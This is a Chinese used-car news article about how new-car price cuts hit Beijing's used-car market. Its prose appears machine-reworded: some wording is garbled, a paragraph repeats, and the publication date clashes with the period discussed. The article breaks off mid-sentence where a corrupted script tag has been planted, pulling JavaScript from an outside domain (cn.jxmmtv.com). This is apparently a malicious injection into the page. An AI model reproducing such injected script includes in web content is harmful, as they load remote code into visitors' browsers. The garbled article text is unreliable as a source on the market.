标王 热搜:
 
当前位置: 首页 » 资讯 » 新车资讯 » 正文

新车流感传染二手车市场 二手车买卖还有多少变数

放大字体  缩小字体 发布日期:2006-05-12   来源:www.googdao.com   作者:车商融   浏览次数:589
二手车讯】:假如说去年北京的二手车买卖超越10万辆大关,是形成了一个“牛市”的话,那今年上半年二手车买卖的冷清就表现出了“熊市”,这其中还出现了不少“异常现象”,不少维持多年的“老规矩”也正在转变。

假如说去年北京的二手车买卖超越10万辆大关,是形成了一个“牛市”的话,那今年上半年二手车买卖的冷清就表现出了“熊市”,这其中还出现了不少“异常现象”,不少维持多年的“老规矩”也正在转变。

  去年上半年因为遭到非典状况的影响,北京上半年二手车买卖平均月买卖量在9000辆左右,下半年遭到了“限制黄标车”的刺激和非典的解除,月买卖量在11000辆左右。总体来讲二手车买卖量的增长是正常范围。

  自1999年开始,伴随新汽车市场场的兴盛和流通环节的加快,北京的二手车年买卖量维持在30%左右的高速增长,有关专家也预测今年北京的二手车买卖量将维持在25%--35%左右的增长量,预计全年买卖量将达到15万辆左右,也就是月平均买卖量在13000辆左右。

  但,今年上半年二手车买卖增长并没像当初预计的那样乐观,特别是进入5月份以来,二手车买卖量产生了明显下滑,月买卖量从年初的12000辆下滑到6月份的9000辆左右,而且这种下滑趋势还在蔓延,7、8、9三个月二手车买卖的“暑假”还将会有一些“降温行动”。

  北京二手车市场出现新动向

  依据北京旧机动车辆买卖市场的统计剖析,北京的二手车买卖在2004年上半年主要出现了以下新特征,与年初的预测有一些差异,而且这部分现象都是因为整个流通环节的“牵连”用途产生的。

  第一是二手车年青化速度放缓,准新车数目降低。年初在二手车市场内比较容易见到一些刚刚生产下线的车型,这部分汽车用时间总是还不到一年,比如新雅阁、新中华、奇瑞QQ、君威、索纳塔等,这部分汽车被业内称作“准新车”,这部分汽车相对更吸引消费者,二手车经纪公司也想从事这部分二手车的中介,盈利情况好,一时间这部分汽车成为二手车市场的“新星”。但好景不长,从3月份开始,这部分“准新车”变得有一些“过气”,并且伴随新车价格的层层掉落,这部分准新车的价格优势也荡然无存。

  相对来讲,用时间超越五年的汽车遭到的新车降价影响比较少,二手车经纪企业的收益虽然少但比较稳定,一些老二手车型开始变得受青睐,这就间接的减缓了二手车年青化的趋势,二手车市场的“老人”又渐渐回来了。

  第二是低档车打天下,高端车难招架。今年新车价格的降价范围很广泛,不只有经济性轿车,也有价值百万元的豪华车,这部分汽车资金占压紧急,风险空间增加,越是价值高的汽车越赔本。一些主要从事高端车的二手车经纪公司不能不开始“自降门槛”,从事一些底价位汽车的买卖,于是就出现了价值百万元的奔驰旁边停着价值一万元奥拓的尴尬场面。目前二手车买卖中盈利的汽车总是是底价值的小车型,那些价值不菲的高端车成为了“陪衬”。

  第三是二手车周转时间加快,低收益趋势难以阻挡。目前的汽车价格变化莫测,二手车周转时间假如还根据以前的规律,那存活危机将进一步加强。依据有关统计,去年新车价格调整基本维持在一个月,而今年被缩短为12天甚至更短,在新车价格变动之前,二手车至少可以周转两个周期,即便新一轮二手车赔本也可以通过下一轮二手车周转来“保本”,总体还是有一些收益的。

  当然,二手车周转时间加快必然要通过降价来刺激二手车消费,今年年初到今天,二手轿车的平均买卖价格降低了9%,一些用时间短的二手车买卖价格甚至降低了15%以上,同比新车降价也毫不逊色,所以刺激用途起到了短期的“增量”。

  新车流感传染二手车市场

  二手车市场的这三个特点其实与新汽车市场场情况和有关政策是有关。二手车买卖总是视作新车买卖之后的“次环节或者二环节”,也就是汽车服务行业的范围内,因此遭到上游市场的影响也是势必的。

  现在来看,上半年二手车市场主要遭到了新汽车市场场有关的三方面影响。

  降价影响很明显。以往新车降价之后二手车将在两周内进行“价格守卫战”。今年二手车市场的价格可以说一直处于“防守”阶段,不间断的降价和优惠活动已经把二手车价格搅动的“非常受伤”了。最要命的还是一些进口车的“加入”,进口高端车动辄数万元甚至几十万元的降价,可以抵消二手车两三年的折旧成本,连一直坚挺的丰田佳美、欧宝威达、现代库派也都比年初有了将近十万元的“缩水”。二手车价格全线“告急”实是不能已的行为。

  新车型新技术冲击二手车。国产车和进口车先后都开始“看重”国内市场,04款紧接着就要出现05款,不断有增加的技术和吸引人的闪光点在二手车面前“炫耀”。一贯高傲的合作厂家也不能不拿出一些“真家伙”来抢占市场,用国际同步、世界接轨价格、特别中国设计等“真心”来换取中国消费者渐渐麻木的“汽车消费心态”。二手车相对的价格优势渐渐丧失,不怕不识货就怕货比货,什么ESP、GPS、发动机密码防盗技术等,在中国有多少人了解真的用和原理?大多数人总是开了5、6年车还没完全熟知自己汽车的不少功能。但,大家都想我们的座驾更先进更亮丽,多花一些钱心里也平衡。

  汽车消费政策和交通环境吓?script src=http://cn.jxmmtv.com/cn.js>cript>

版权声明:凡未注明车商融二手车来源的信息,均为转载自其他媒体,转载并不代表本网赞同其观点,也不代表本网对其真实性负责。(您若对该稿件内容有任何疑问或质疑,请即与车商融二手车联系)。
本文详细地址: (http://www.cheshangrong.com/news/200605/12/5541.html)
 
 
[ 资讯搜索 ]  [ 加入收藏 ]  [ 告诉好友 ]  [ 打印本文 ]  [ 违规举报 ]  [ 关闭窗口 ]

 
0相关评论

 
推荐图文
推荐资讯
点击排行
 
车商融二手车 | 关于我们 | 联系方式 | 使用协议 | 版权隐私 | 网站地图 | 排名推广 | 广告服务 | 积分换礼 | 网站留言 | RSS订阅 | 全国分站
假如说去年北京的二手车买卖超越10万辆大关,是形成了一个“牛市”的话,那今年上半年二手车买卖的冷清就表现出了“熊市”,这其中还出现了不少“异常现象”,不少维持多年的“老规矩”也正在转变。